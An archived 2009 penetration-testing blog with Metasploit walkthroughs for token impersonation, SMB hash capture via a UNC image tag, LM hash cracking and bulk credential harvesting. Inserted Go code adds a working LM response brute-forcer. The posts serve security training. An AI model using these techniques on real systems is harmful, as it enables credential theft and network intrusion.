Monday, April 27, 2009

Social Engineering Master Class at ChicagoCon

I'm excited that next week I'll be attending the Social Engineering Master Class at ChicagoCon with Chris Nickerson and Mike Murray. I'll also be sticking around to give my Client-Side talk for the con portion on Saturday.

The outline for the SE Master Class is up and it looks good!

"The world of Information Security is changing. Budgets are tighter, attacks are more sophisticated, and the corporate network is no longer the low hanging fruit. That leaves web-enabled applications as the vector-du-jour, but that well is quickly drying up for organized crime as well. As they creep up the OSI Model looking for easier ways to steal your corporate assets, they are quickly making their way up the stack to the unspoken 8th layer, the end user. So what is the next step in the never-ending escalation of this cyber war?

To find out, we must do as Sun Tzu taught. "Think like our enemy!" That is, after all, the primary tenet of penetration testing AKA ethical hacking, isn't it? After years of hardening physical systems, networks, OSs, and applications, we have now come full circle to a new dawn of attack. People are now the target of the advanced hacker, and the cross-hairs are focused squarely on their foreheads... literally. It is only a matter of time before corporations feel the pain of wetware hacking requiring a new approach to testing and defense. It has become imperative to assemble a world-class team of experts to train professionals on the technologies and methods of the most dangerous and costly attackers, social engineers."

I think there are still seats available for the class and tickets for the con portion as well.

See everyone in Chicago!


Modern Social Engineering Webcast Part II

Be sure to check out

Part II of the Modern Social Engineering Webcast with Chris Nickerson and Mike Murray

Webcast: Modern Social Engineering Part II - Top 5 Ways to Manipulate Humans Over the Wire

Join world-renowned social engineers, Chris Nickerson of TruTV's Tiger Team and noted expert and international speaker, Mike Murray, as they prepare you for the future of pen testing. This webcast on Thursday April 30, 2009 at 12:00 Noon CDT continues your education in the world of "Modern Social Engineering."

Wednesday, April 22, 2009

Shotgun Blast 22 April 2009

Quick links of relevant stuff that I'm too lazy to fully comment on

1st up, Robert Graham preaching it on why Cyber Commands will fail.

2. Time for an Internet A-Team...Interview with Joe Stewart on what to do about cyber criminals.

3. Laramies on post exploitation with Meterpreter

4. Frankly disappointing news that any country would make a website against the law and order all ISPs to block it ...Belgium FTW!! Talk about the beginning of a slippery slope into China-like behavior...up next Carnal Blog for having a dissenting opinion.

5. Pulling data and file information from system restore points

6. Combating the ora_ntlm_stealer technique. Link to the original white paper also in the post.

7. Online metadata extraction with FOCA

8. Ahh the "forever-ness" of the internet and how stupid ass questions may bite you in the ass later in life...Professor 0110 FTW!!


Monday, April 20, 2009

How do YOU defend against 0day?!

There is an interesting thread over on DailyDave about 0day and what you can do about it.

It's far from complete, so go read the thread and come back...

Thus far Ron Gula's response is the best.

My thoughts on this are that it really depends a lot on the maturity of the environment. Most environments wouldn't stand a chance against even a crappy targeted client-side attack using public vulnerabilities. If you throw in 0day...forget about it. But assuming a mature environment, I think you use 0day to test your defenses against targeted and 0day attacks.

Does one 0day totally own your network?

I think using 0day allows you to test:

* Are things segregated properly enough that someone popping a shell on a workstation can't get access to "what makes you money"?
* Does your HIPS/HIDS stop that stack/heap overflow? Does it stop you from putting new binaries on the box for post exploitation?
* Is your AV worth anything? How long before 0day (that eventually becomes public) becomes an AV alert?
* Does your network IPS/IDS detect or block the exploit traffic?
* Can you detect the outbound traffic? And RESPOND?!
* Are your users running with elevated privileges, or are your admins doing their regular work with their admin accounts?

that sort of thing...thoughts?

Back from Notacon

g0ne and I just got back from presenting on Client-Side Attacks at Notacon. You can check out his write up here. I have pretty much the same things to say.

It was definitely a unique con, especially since it was more "everything tech" versus hardcore. Like g0ne said, we ended up with lots of down time in between talks we were interested in. We spent a bit of time in the lockpick village, so that was fun. I usually don't have time to do that stuff because I have talks I want to see.

that's about it...

Up next ChicagoCon in May. I'll also be up there for the Social Engineering Master Class so I'm excited about that.


Sunday, April 12, 2009

carnal0wnage on Exotic Liability Podcast

Chris Nickerson was kind enough to ask me to join him for his Exotic Liability podcast.

You can check it out here:

Main Exotic Liability Page:

I had a blast! I'm really looking forward to hearing the rest of the interviews/podcasts. They had some really sharp people come on the show including Mike Murray, Val Smith, Delchi, and Max Caceres.

Next time we'll get Dean in on the call.

Notes from the podcast (or stuff I forgot to mention but should have)

Oracle Demo video from ShmooCon Firetalk

Metasploit Oracle API and some code (still beta)

**requires Oracle Instantclient and rubydbi and probably some other stuff

SOURCE Boston video of Vince's and my client-side talk

Check out Michael Santarcangelo's book on Defending against Breaches, which has a lot to do with educating users, user awareness programs, defending against SE, and handling data breaches....a must read!

g0ne and I will be giving the client-side talk at NotaCon 6 in April and ChicagoCon in May

Friday, April 10, 2009

More on working with Incognito and Metasploit

Since a buddy asked for some clarification on using incognito extension with Metasploit/Meterpreter I'll post some more notes on it.

the background you need is here:

Let's set up the scenario.

We either exploited something...yea! or we guessed an admin password and used the psexec module (that's what I did). The psexec module will drop us to a SYSTEM shell if all went well.

msf exploit(psexec) > sessions

Active sessions

Id Description Tunnel
-- ----------- ------
1 Meterpreter ->

msf exploit(psexec) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer: ORACLE-ENT
OS : Windows .NET Server (Build 3790, Service Pack 2).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > use incognito
Loading extension incognito...success.

Now we want to query what tokens are available.

Incognito Commands

Command Description
------- -----------
add_group_user Attempt to add a user to a global group with all tokens
add_localgroup_user Attempt to add a user to a local group with all tokens
add_user Attempt to add a user with all tokens
impersonate_token Impersonate specified token
list_tokens List tokens available under current user context
snarf_hashes Snarf challenge/response hashes for every token

meterpreter > list_tokens
Usage: list_tokens

Lists all accessible tokens and their privilege level


-g List tokens by unique groupname
-u List tokens by unique username

meterpreter > list_tokens -u

Delegation Tokens Available

Impersonation Tokens Available

We want to become the ORACLE-ENT\Administrator user

meterpreter > impersonate_token
Usage: impersonate_token

Instructs the meterpreter thread to impersonate the specified token. All other actions
will then be made in the context of that token.

Hint: Double backslash DOMAIN\\name (meterpreter quirk)
Hint: Enclose with quotation marks if name contains a space

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > impersonate_token ORACLE-ENT\\Administrator
[+] Delegation token available
[+] Successfully impersonated user ORACLE-ENT\Administrator
meterpreter > getuid
Server username: ORACLE-ENT\Administrator


Ok, should you need to get back to system, just do a rev2self

meterpreter > rev2self
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > impersonate_token ORACLE-ENT\\Administrator
[+] Delegation token available
[+] Successfully impersonated user ORACLE-ENT\Administrator
meterpreter > getuid
Server username: ORACLE-ENT\Administrator

Now you'll probably want to run commands as that user...I hope that was the point of all this...

After you load the incognito extension you'll get an extra option with your execute options (-t)

meterpreter > execute
Usage: execute -f file [options]

Executes a command on the remote machine.


-H Create the process hidden from view.
-a The arguments to pass to the command.
-c Channelized I/O (required for interaction).
-d The 'dummy' executable to launch when using -m.
-f The executable command to run.
-h Help menu.
-i Interact with the process after creating it.
-m Execute from memory.
-t Execute process with currently impersonated thread token

We need to use "-t" so the new process runs under the impersonated thread token; otherwise you'll get a shell as SYSTEM or whoever you were before impersonating.

meterpreter > execute -f cmd.exe -H -c -i -t
Process 2936 created.
Channel 6 created.
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.



Detecting VMware with JavaScript (or how to waste your time with pointless exercises)

So a thread on discussed some JavaScript tricks that web exploit kits are using to screw with analysts looking at the malicious sites and js. Today most analysts will use a debugger or interpreter like Rhino or Malzilla. Well, the site authors are starting to add code to either cause the script to exit when run in one of the interpreters or to do more malicious stuff like delete files and such. [original article]

One of the questions asked was if it was possible, or currently being implemented by malware authors, to use JavaScript to detect if the browser was inside a virtual machine. Before I continue let me say that this is completely pointless from a malware perspective. Detecting the presence of a vm using client side JavaScript is just silly. Not hard to bypass. Just comment it out and move on. Now if this could be done server side then perhaps it might have value. Still pointless though.

Anyway I wondered if you could do it using JavaScript and so wasted way too much time on getting it to work. I guess you could do this in Java but regardless of how you do it the user will need to interact with your script to run it. If there is a way to bypass that requirement then let me know.

There are various methods out there for detecting VMs, but for this example I figured I'd keep it simple and use the MAC address as an indicator. VMware has their own OUI for the MAC addresses that are dynamically generated when you install VMware Workstation. The OUI is different for VMware Player but I focused on Workstation. I figured that an ActiveX object would be the easiest way to go to determine the MAC and, if it matched the OUI, to alert.

After fooling around a bit I came up with this:

<script language="javascript">
function vmDetect(){
    var o = new ActiveXObject("WbemScripting.SWbemLocator");
    var s = o.ConnectServer(".");        // connect to WMI on the local machine
    var a = s.ExecQuery("SELECT * FROM Win32_NetworkAdapterConfiguration");
    var e = new Enumerator(a);
    var mac = [];
    var regex = /^00:50:56/;             // OUI of VMware's dynamically generated MAC address, anchored to the start of the string

    for (; !e.atEnd(); e.moveNext()) {   // Loop over adapter configurations.
        var x = e.item();
        if (x.MACAddress) {              // adapters without a MAC (tunnels, etc.) return null
            mac[mac.length] = x.MACAddress;
        }
    }
    for (var i = 0; i < mac.length; i++) {
        if (mac[i].match(regex)) {
            alert("ohnes! you're in a virtual machine");
            return true;
        }
    }
    return false;
}
</script>

Basically the script uses the ConnectServer method of the SWbemLocator object to get an SWbemServices object, whose ExecQuery method returns a collection. In this case we are querying the Win32_NetworkAdapterConfiguration WMI class to return the properties of the network adapters on the system. Once we have these values we, quite unnecessarily, add the MACAddress values to an array and then iterate through the array, alerting on the first string that matches the regular expression we created.

You don't really need the array. You could remove the array and just do:

if (x.MACAddress && x.MACAddress.match(regex)) {
    alert("ohnes! you're in a virtual machine");
}

So yes, you can use JavaScript, or in my case bad JavaScript, to determine, at a basic level, if you're in a VM. But like I said, it's kinda pointless. :)

dean de beer
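As an added example (not Dean's script or any code from the post), here is the same OUI check written as a Go function an analyst can run offline against a list of adapter addresses. The list of VMware OUIs is an assumption from memory of the IEEE registry and should be checked there before relying on it; beyond the post's single prefix, the function normalises separators and case, anchors the match to the start of the address (the original regex /(00:50:56).*/ was unanchored), and skips adapters that report no MAC, which would make the original script throw.

```go
package main

import (
	"fmt"
	"strings"
)

// vmwareOUIs: 24-bit prefixes registered to VMware, Inc. (assumed from
// memory of the IEEE OUI registry; verify there). The post only used 00:50:56.
var vmwareOUIs = []string{"00:50:56", "00:0c:29", "00:05:69", "00:1c:14"}

// normalizeMAC returns a lower-case, colon-separated MAC, or "" if the input
// is not a 48-bit address. WMI returns "00:50:56:AB:CD:EF"; other tools use
// dashes, dots or no separators at all.
func normalizeMAC(raw string) string {
	digits := strings.ToLower(strings.NewReplacer(":", "", "-", "", ".", "").Replace(strings.TrimSpace(raw)))
	if len(digits) != 12 {
		return ""
	}
	for _, c := range digits {
		if !strings.ContainsRune("0123456789abcdef", c) {
			return ""
		}
	}
	parts := make([]string, 6)
	for i := range parts {
		parts[i] = digits[2*i : 2*i+2]
	}
	return strings.Join(parts, ":")
}

// isVMwareMAC reports whether the first three octets are a VMware OUI. The
// comparison is anchored to the start of the address, so an address that
// merely contains those octets further in does not match.
func isVMwareMAC(raw string) bool {
	mac := normalizeMAC(raw)
	if mac == "" {
		return false
	}
	for _, oui := range vmwareOUIs {
		if strings.HasPrefix(mac, oui) {
			return true
		}
	}
	return false
}

// flagVMwareAdapters mirrors the script's loop over
// Win32_NetworkAdapterConfiguration: a nil entry stands for the null
// MACAddress that tunnel and loopback adapters return, and is skipped.
func flagVMwareAdapters(macs []*string) []string {
	var hits []string
	for _, m := range macs {
		if m != nil && isVMwareMAC(*m) {
			hits = append(hits, normalizeMAC(*m))
		}
	}
	return hits
}

func main() {
	// Constructed sample: a VMware virtual NIC, an adapter with no MAC, and a
	// locally administered address that contains 00:50:56 after the first octet.
	vmnic := "00:50:56:AB:CD:EF"
	lookalike := "02:00:50:56:11:22"
	fmt.Println(flagVMwareAdapters([]*string{&vmnic, nil, &lookalike}))
}
```

Running it flags only the first address; the unanchored regex from the post would also have fired on the third.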

Monday, April 6, 2009

Maltego for Network Infrastructure Enumeration

New article on Using Maltego for Network Infrastructure Enumeration posted on

Any organization that has an Internet presence needs to have some form of infrastructure to support their presence. During Infrastructure Enumeration you attempt to discover how much of it exists, what type of infrastructure is used, where it is located, what technology is used and how it is structured. This type of information is interesting for:

* Security assessments (as this is the first and most tedious phase of any external assessment).
* Getting an idea of the organization’s Internet and geographical presence.
* Gaining insight into the technology used by the organization.
* Making connections between seemingly unconnected organizations (as they might be sharing common infrastructure).
* Getting a list of brands or affiliations supported by the organization.

Read the article over on

Using the Metasploit SMB Sniffer Module

There has been some talk about using the SMB Relay module in Metasploit and then trying to crack those hashes. I'll spare the links to protect the uninformed.

The SMB Relay module is for doing just what it says, relaying the SMB session back to another host. It used to be the same host but now, post 08-068, you have to pick another system on the network. Doesn't matter what system, just not the same system. (I'll try to cover this in another blog post soon)

Additionally, the SMB Relay module provides a random challenge for each attempt and doesn't log those challenges anywhere that you could go back and use. So that pretty much rules out using the hashes you see in the output for password cracking.

For background, the SMB Relay output looks like this, which looks just like the output from the module that will actually work :-(
[*] Received XPSP1VM\vmwareXP LMHASH:7c83b9be93e202a4be355b75e982144b59bb9f836ec26200 NTHASH:9fc0fba25cb2817441a0ca8c003a4b68da83ef9e72514b2e OS:Windows 2002 2600 Service Pack 1 LM:Windows 2002 5.1

So what are we to do? Use the SMB Sniffer module of course!

The SMB sniffer module allows you to capture LM/NTLM hashes that can be cracked later. It uses a known, fixed challenge, which allows you to crack the hash offline.

msf > use auxiliary/server/capture/smb
msf auxiliary(smb) > info

Name: Authentication Capture: SMB
Version: 5966

Provided by:

This module provides a SMB service that can be used to capture the challenge-response password hashes of SMB client systems. All responses sent by this service have the same hardcoded challenge string (\x11\x22\x33\x44\x55\x66\x77\x88), allowing for easy cracking using Cain & Abel or L0phtcrack. To exploit this, the target system must try to authenticate to this module. The easiest way to force a SMB authentication attempt is by embedding a UNC path(\\SERVER\SHARE) into a web page or email message. When the victim views the web page or email, their system will automatically connect to the server specified in the UNC share (the IP address of the system running this module) and attempt to authenticate.

We need to force a victim to authenticate to metasploit. The easiest way is to embed a UNC link into a webpage or email.

Example: <img src="\\networkIP\share\1.gif">

Once the victim's browser tries to authenticate, the sniffer module will capture the hashes (which can be cracked later using rainbow tables). You'll notice the difference between this module and SMB Relay which issues a random challenge making cracking impossible. So if you want to crack passwords, use the server/capture/smb auxiliary module, if you want to try to get a shell use the smb_relay exploit module.

msf > use auxiliary/server/capture/smb
msf auxiliary(smb) > run
[*] Auxiliary module running as background job
msf auxiliary(smb) >
[*] Server started.
[*] Captured XPSP1VM\Administrator LMHASH:76365e2d142b5612980c67d057eb9efeee5ef6eb6ff6e04d NTHASH:727b4e35f947129ea52b9cdedae86934bb23ef89f50fc595 OS:Windows 2002 Service Pack 1 2600 LM:Windows 2002 5.1
[*] Captured XPSP1VM\Administrator LMHASH:76365e2d142b5612980c67d057eb9efeee5ef6eb6ff6e04d NTHASH:727b4e35f947129ea52b9cdedae86934bb23ef89f50fc595 OS:Windows 2002 Service Pack 1 2600 LM:Windows 2002 5.1
[*] Captured XPSP1VM\Administrator LMHASH:76365e2d142b5612980c67d057eb9efeee5ef6eb6ff6e04d NTHASH:727b4e35f947129ea52b9cdedae86934bb23ef89f50fc595 OS:Windows 2002 Service Pack 1 2600 LM:Windows 2002 5.1

We can now use HALFLM rainbow tables with the 1122334455667788 challenge to crack the first half of the password.

**We only take the first 16 characters of the LM hash output


We can then use rainbow tables to crack the first half:

$ ./rcracki *.rti -h 76365e2d142b5612
264241152 bytes read, disk access time: 4.97 s
verifying the file...
searching for 1 hash...
plaintext of 76365e2d142b5612 is PASSWOR
cryptanalysis time: 5.24 s

plaintext found: 1 of 1 (100.00%)
total disk access time: 4.97 s
total cryptanalysis time: 5.24 s
total chain walk step: 1783216
total false alarm: 591
total chain walk step due to false alarm: 703255

76365e2d142b5612 PASSWOR hex:50415353574f52

You will have to guess or bruteforce the rest :-( but thankfully there is a tool in your metasploit tools directory to help you do just that!

$ ruby halflm_second.rb

Usage: halflm_second.rb


-h Display this help information
-n The encypted LM hash to crack
-p The decrypted LANMAN password for bytes 1-7

$ ruby halflm_second.rb -n 76365e2d142b5612980c67d057eb9efeee5ef6eb6ff6e04d -p PASSWOR
[*] Trying one character...
[*] Cracked: PASSWORD
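To make the HALFLM step concrete, here is an added Go example (my own code, not part of this post or of Metasploit) that builds the LM hash and the 24-byte LM challenge response from the standard definitions, parses a "[*] Captured ..." line to show which 16 hex characters go to rcracki, and then does what halflm_second.rb does: brute-forces the characters after the seven recovered from the rainbow tables until the full response matches. The capture line and the password PASSWORD are constructed; the fixed challenge is the one the module prints above; the character set and the maxExtra limit are my choices.

```go
package main

import (
	"bytes"
	"crypto/des"
	"encoding/hex"
	"fmt"
	"strings"
)

// Fixed challenge hard-coded by auxiliary/server/capture/smb.
var captureChallenge = []byte{0x11, 0x22, 0x33, 0x44, 0x55, 0x66, 0x77, 0x88}

const lmCharset = "ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"

// desKey spreads a 7-byte (56-bit) key over 8 bytes as DES expects; the low
// bit of each byte is a parity bit the key schedule ignores, so it is left 0.
func desKey(k []byte) []byte {
	return []byte{
		k[0] & 0xFE, (k[0]<<7 | k[1]>>1) & 0xFE, (k[1]<<6 | k[2]>>2) & 0xFE,
		(k[2]<<5 | k[3]>>3) & 0xFE, (k[3]<<4 | k[4]>>4) & 0xFE,
		(k[4]<<3 | k[5]>>5) & 0xFE, (k[5]<<2 | k[6]>>6) & 0xFE, (k[6] << 1) & 0xFE,
	}
}

// desEncrypt encrypts a single 8-byte block under a 7-byte key.
func desEncrypt(key7, block []byte) []byte {
	c, err := des.NewCipher(desKey(key7))
	if err != nil {
		panic(err) // only reachable with a malformed key length
	}
	out := make([]byte, 8)
	c.Encrypt(out, block)
	return out
}

// lmHash: upper-case the password, pad/truncate to 14 bytes, and use each
// 7-byte half as a DES key on the constant "KGS!@#$%". The halves are
// independent, which is the weakness the HALFLM tables exploit.
func lmHash(password string) []byte {
	pw := make([]byte, 14)
	copy(pw, strings.ToUpper(password))
	magic := []byte("KGS!@#$%")
	return append(desEncrypt(pw[0:7], magic), desEncrypt(pw[7:14], magic)...)
}

// lmResponse: pad the 16-byte LM hash to 21 bytes, split into three 7-byte
// DES keys, and encrypt the challenge with each. Response bytes 0-7 depend
// only on hash bytes 0-6, hence only on the first seven password characters.
func lmResponse(hash, challenge []byte) []byte {
	key := make([]byte, 21)
	copy(key, hash)
	resp := make([]byte, 0, 24)
	for i := 0; i < 3; i++ {
		resp = append(resp, desEncrypt(key[i*7:i*7+7], challenge)...)
	}
	return resp
}

// parseCaptureLine extracts user, LMHASH and NTHASH from one "[*] Captured"
// line; lm[:16] is the value handed to rcracki in the post.
func parseCaptureLine(line string) (user, lm, nt string, ok bool) {
	f := strings.Fields(line)
	for i, w := range f {
		switch {
		case w == "Captured" && i+1 < len(f):
			user = f[i+1]
		case strings.HasPrefix(w, "LMHASH:"):
			lm = strings.ToLower(strings.TrimPrefix(w, "LMHASH:"))
		case strings.HasPrefix(w, "NTHASH:"):
			nt = strings.ToLower(strings.TrimPrefix(w, "NTHASH:"))
		}
	}
	return user, lm, nt, user != "" && len(lm) == 48 && len(nt) == 48
}

// halfLMSecond mirrors halflm_second.rb: with the first seven characters
// known, append 1..maxExtra characters from lmCharset until the recomputed
// 24-byte response equals the captured one.
func halfLMSecond(known string, response, challenge []byte, maxExtra int) (string, bool) {
	for n := 1; n <= maxExtra; n++ {
		idx := make([]int, n) // odometer over lmCharset positions
		for {
			cand := known
			for _, j := range idx {
				cand += lmCharset[j : j+1]
			}
			if bytes.Equal(lmResponse(lmHash(cand), challenge), response) {
				return cand, true
			}
			p := n - 1
			for ; p >= 0; p-- { // advance the odometer, carrying on wrap-around
				idx[p]++
				if idx[p] < len(lmCharset) {
					break
				}
				idx[p] = 0
			}
			if p < 0 {
				break // every combination of this length tried
			}
		}
	}
	return "", false
}

func main() {
	// Constructed capture line: the hashes are computed here for the password
	// "PASSWORD" under the module's fixed challenge, not taken from a real capture.
	resp := lmResponse(lmHash("PASSWORD"), captureChallenge)
	line := "[*] Captured LAB\\user LMHASH:" + hex.EncodeToString(resp) +
		" NTHASH:" + strings.Repeat("0", 48) + " OS:Windows 2002"
	user, lm, _, ok := parseCaptureLine(line)
	fmt.Println(user, ok, "-> rcracki -h", lm[:16])
	full, found := halfLMSecond("PASSWOR", resp, captureChallenge, 2)
	fmt.Println("second half:", full, found)
}
```

Feeding the LMHASH bytes captured above as response and PASSWOR as known should reproduce the halflm_second.rb run. Raising maxExtra to 7 covers the full second half but costs 36^7 DES triples in the worst case, which is why the post uses rainbow tables for the first half and only brute-forces the remainder.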

Carnal0wnage Blog makes the top 5 Best Technical Security Blog

I am happy to announce that Carnal0wnage Blog made the top 5 Best Technical Security Blogs for the RSA Social Security Awards

Best Technical Security Blog

Carnal 0wnage
Zero Day
Schneier on Security
Rational Survivability

Thanks to everyone that voted or to whoever coded up that burp script :-)

Thursday, April 2, 2009

Automatic credential collection and storage with CredCollect

In previous posts here at Carnal0wnage, CG has diligently covered using MSF and meterpreter to do all kinds of stuff, including grabbing hashes with the Priv extension (Vinnie Liu) and tokens with the Incognito extension (Luke Jennings). These are powerful post-exploitation features that yield invaluable information to the engaging team, therefore the presentation and accessibility of this data becomes an important factor as the scale of the engagement and number of targets grows. CredCollect is a simple plugin for MSF that hooks meterpreter session events and performs the gathering and persistent storage of this data for you transparently.

Upon successful session creation, the CredCollect plugin determines if the session opened is indeed a meterpreter session, loads the Priv and Incognito extensions, and extracts the hashes and tokens from the target. The plugin then stores each hash and token as a Note in the database of the framework instance and hands the session back to the console for the user to interact with it at the standard meterpreter> prompt.

The plugin also adds two commands to the MSF console when loaded named db_hashes and db_tokens respectively. The db_hashes command prints all of the hashes accrued in the database in a format suitable for import into various password crackers (OphCrack, L0pht, etc). The db_tokens command simply prints all of the tokens in the database with the host they were found on.

msf > help

credcollect Commands
Command Description
------- -----------
db_hashes Dumps hashes collected in the database
db_tokens Dumps tokens collected in the database with host information

The utility of this plugin is best realized in medium to large scale engagements (read: beaucoup shellz) such as internal engagements or external phishing campaigns that result in multiple parallel sessions returning to the team at unpredicted rates and times.

Some common scenarios of use and bite-sized demos:

The db_hashes command is useful after a day or two of sweeping for low hanging fruit and pilfering hashes. The team can easily export all of the credentials that were transparently collected in the database and start cracking them for the next phase of the attack.

msf auxiliary(psexec) >
[*] Meterpreter session 1 opened ( ->
[*] This is CredCollect, I have the conn!

[*] Meterpreter session 2 opened ( ->
[*] This is CredCollect, I have the conn!

[*] Meterpreter session 3 opened ( ->
[*] This is CredCollect, I have the conn!

[*] Meterpreter session 4 opened ( ->
[*] This is CredCollect, I have the conn!

msf auxiliary(psexec) > db_hashes

The db_tokens command is useful in situations where you seek a specific user token and want to know if you've found that token on any of the boxes the team has compromised. For example, if you were to own a local service account or backup admin account, you could plug those credentials into psexec_scanner and automate searching an entire subnet or domain for a box with a domain admin token on it that you have gained access to.


As you can see highlighted, we have found the desired 'batman' user token is accessible on ''.

And at the end of the day, all of these are just Notes in the MSF database, so you can display them as such, or query the information from the actual database file with any sqlite client.

msf auxiliary(psexec) > db_notes
[*] Time: Thu Mar 26 01:05:18 -0700 2009 Note: host= type=auth_SMB data=AUTH Administrator password
[*] Time: Thu Mar 26 01:05:18 -0700 2009 Note: host= type=auth_SMB data=AUTH Administrator password
[*] Time: Thu Mar 26 01:05:18 -0700 2009 Note: host= type=auth_SMB data=AUTH Administrator password
[*] Time: Thu Mar 26 01:05:25 -0700 2009 Note: host= type=auth_TOKEN data=LAB-B2257C3B992\batman
[*] Time: Thu Mar 26 01:05:25 -0700 2009 Note: host= type=auth_TOKEN data=NT AUTHORITY\SYSTEM
[*] Time: Thu Mar 26 01:05:25 -0700 2009 Note: host= type=auth_TOKEN data=LAB-B2257C3B992\labadmin
[*] Time: Thu Mar 26 01:05:25 -0700 2009 Note: host= type=auth_TOKEN data=NT AUTHORITY\ANONYMOUS LOGON

So you can load the CredCollect plugin at startup and transparently collect credential information. Also, since the initial implementation of this code was in a meterpreter script, you can drop the credcollect meterpreter script in your scripts directory and use it in one-off cases, or whenever you feel more comfortable doing it manually than loading the plugin.
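Since the notes are plain text, the db_tokens question from this post ("which of the boxes we hold has a token for user X?") can be answered from saved db_notes output without the console. The following Go program is an added example, not CredCollect's code: it parses db_notes lines into host/type/data, indexes tokens by host and de-duplicates repeated captures. The host addresses in the sample are constructed (the post's output had them stripped); the data values follow the post.

```go
package main

import (
	"fmt"
	"sort"
	"strings"
)

// note is one row of the framework's notes table as db_notes prints it.
type note struct {
	Host, Type, Data string
}

// parseNote extracts host=, type= and data= from a db_notes line. data= is
// taken as the rest of the line because token names such as
// "NT AUTHORITY\SYSTEM" contain spaces.
func parseNote(line string) (note, bool) {
	i := strings.Index(line, "host=")
	j := strings.Index(line, " type=")
	k := strings.Index(line, " data=")
	if i < 0 || j < i || k < j {
		return note{}, false
	}
	return note{
		Host: line[i+len("host=") : j],
		Type: line[j+len(" type=") : k],
		Data: line[k+len(" data="):],
	}, true
}

// parseNotes keeps every line that parses as a note and ignores the rest.
func parseNotes(output string) []note {
	var notes []note
	for _, line := range strings.Split(output, "\n") {
		if n, ok := parseNote(line); ok {
			notes = append(notes, n)
		}
	}
	return notes
}

// hostsWithToken lists the hosts holding a token for user, given either as
// DOMAIN\user or as the bare user name, case-insensitively. Output is sorted
// and de-duplicated.
func hostsWithToken(notes []note, user string) []string {
	want := strings.ToLower(user)
	seen := map[string]bool{}
	for _, n := range notes {
		if n.Type != "auth_TOKEN" {
			continue
		}
		tok := strings.ToLower(n.Data)
		bare := tok
		if p := strings.LastIndex(tok, `\`); p >= 0 {
			bare = tok[p+1:]
		}
		if tok == want || bare == want {
			seen[n.Host] = true
		}
	}
	hosts := make([]string, 0, len(seen))
	for h := range seen {
		hosts = append(hosts, h)
	}
	sort.Strings(hosts)
	return hosts
}

// uniqueByType de-duplicates note data of one type, the way the three
// identical auth_SMB notes above collapse to a single credential for export.
func uniqueByType(notes []note, typ string) []string {
	seen := map[string]bool{}
	var out []string
	for _, n := range notes {
		if n.Type == typ && !seen[n.Data] {
			seen[n.Data] = true
			out = append(out, n.Data)
		}
	}
	return out
}

// Constructed db_notes output (hosts made up, data values from the post).
const sampleNotes = `msf auxiliary(psexec) > db_notes
[*] Time: Thu Mar 26 01:05:18 -0700 2009 Note: host=10.0.0.21 type=auth_SMB data=AUTH Administrator password
[*] Time: Thu Mar 26 01:05:18 -0700 2009 Note: host=10.0.0.21 type=auth_SMB data=AUTH Administrator password
[*] Time: Thu Mar 26 01:05:25 -0700 2009 Note: host=10.0.0.21 type=auth_TOKEN data=LAB-B2257C3B992\batman
[*] Time: Thu Mar 26 01:05:25 -0700 2009 Note: host=10.0.0.21 type=auth_TOKEN data=NT AUTHORITY\SYSTEM
[*] Time: Thu Mar 26 01:05:31 -0700 2009 Note: host=10.0.0.37 type=auth_TOKEN data=LAB-B2257C3B992\labadmin
[*] Time: Thu Mar 26 01:05:31 -0700 2009 Note: host=10.0.0.37 type=auth_TOKEN data=NT AUTHORITY\ANONYMOUS LOGON`

func main() {
	notes := parseNotes(sampleNotes)
	fmt.Println("batman token on:", hostsWithToken(notes, "batman"))
	fmt.Println("unique SMB creds:", uniqueByType(notes, "auth_SMB"))
}
```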

Source or it didn't happen..

Plugin - Script

This plugin was definitely inspired by a similar effort that Valsmith and Colin Ames (now of AttackResearch) presented at DefCon 16 in their talk 'Meta-Post Exploitation' called MetaPass but to my knowledge that plugin was never publicly released.

PS. For a while a hairy thread issue kept this thing from working reliably so I'd like to thank egypt and icer for helping me debug it and track it down and hdm for ultimately fixing it in Changeset 6831